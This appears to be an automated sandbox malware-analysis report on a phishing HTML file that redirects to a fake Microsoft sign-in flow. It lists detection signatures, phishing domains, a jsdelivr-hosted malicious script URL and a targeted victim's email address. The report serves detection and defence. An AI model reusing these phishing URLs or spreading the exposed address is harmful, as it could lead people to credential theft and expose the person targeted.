Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A_C_H_JAN14.htm

Overview

General Information

Sample name:A_C_H_JAN14.htm
Analysis ID:1592194
MD5:1df9751c6e80d2f2a9fa3c926e118317
SHA1:e89c7c6e532e82d7bf2d1471a061a9b29258819e
SHA256:916859eff63990aa5fe16534bf4fbab689af37db673be426289f6bfdba68abc7

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
AI detected suspicious URL
HTML Script injector detected
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\A_C_H_JAN14.htm MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2012,i,1761999076979844411,4633428751578564589,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 1.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMEN... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script fetches data from a potentially suspicious domain and then opens a new window with a URL that includes encoded parameters. This behavior is highly suspicious and indicates a potential phishing or malicious activity.
Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... This script demonstrates several high-risk behaviors, including detecting browser automation tools, disabling common developer tools and keyboard shortcuts, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of phishing or other malicious activities.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the intent is not entirely clear, the combination of these factors suggests a potentially malicious script that requires further investigation.
Source: 0.8.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, but also sets up event handlers and makes network requests to external domains, some of which appear to be of dubious reputation. The script also attempts to bypass form submission and redirect the user to a Microsoft login page, which is highly suspicious behavior. Overall, this script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://pending-revew.pages.dev
Source: file:///C:/Users/user/Desktop/A_C_H_JAN14.htmHTTP Parser: New script, src: https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMENTUM/NOW.API.JS
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: A_C_H_JAN14.htmHTTP Parser: Base64 decoded: fwilliams@liftone.net
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: A_C_H_JAN14.htmHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/A_C_H_JAN14.htmHTTP Parser: No favicon
Source: https://pending-revew.pages.dev/#?service=Wm5kcGJHeHBZVzF6UUd4cFpuUnZibVV1Ym1WMCZtaW5kZWQmYQ==HTTP Parser: No favicon
Source: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.netHTTP Parser: No favicon
Source: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.netHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725728503649654.MDc0NWZjYTgtOTE5YS00NzZmLWE0NTUtNWMxMDA2MWEwY2Q4NjhlOTViZmQtYTNhZC00NTQ3LTk5YmYtZWEwNDRlZWRkNjMx&ui_locales=en-US&mkt=en-US&client-request-id=897caf4c-9619-41c0-85fd-07bfc414c2d8&state=p-sG9YfLavTX3VFZQzNJi-IvbeRmoLbvuprgkaA1uclh2hzhx_0oBLvdJltUioem5-SQICaCrjv7c3xM0CXZhNSwDllpMpTGAaQzsXdQZ5NLz7kLZkaUDEPpKjpZPs02oSG7YLfhhowZ2M1mHuAyxiwhKgKiHahmlBO8EkuGqfkO9p8lZVOeLcD6v1sha057aoHBFDXQu96gIS9s4_Fv7gMx-RzFLMaxeOxzA6gmNyZehZLDT9dkM1BQI_XVvjCNalS1V2rlbf1tYKdV0fDf0w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.17:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.227.222:443 -> 192.168.2.17:49800 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49802 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 28MB
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: natrium100gram.site
Source: global trafficDNS traffic detected: DNS query: pending-revew.pages.dev
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: topimo.trilidarn.ru
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: nxuujj8c2bdeatmaujlbr0ml0o8s217ndkeeukkfgrp7cltltztrbllks.deryposi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
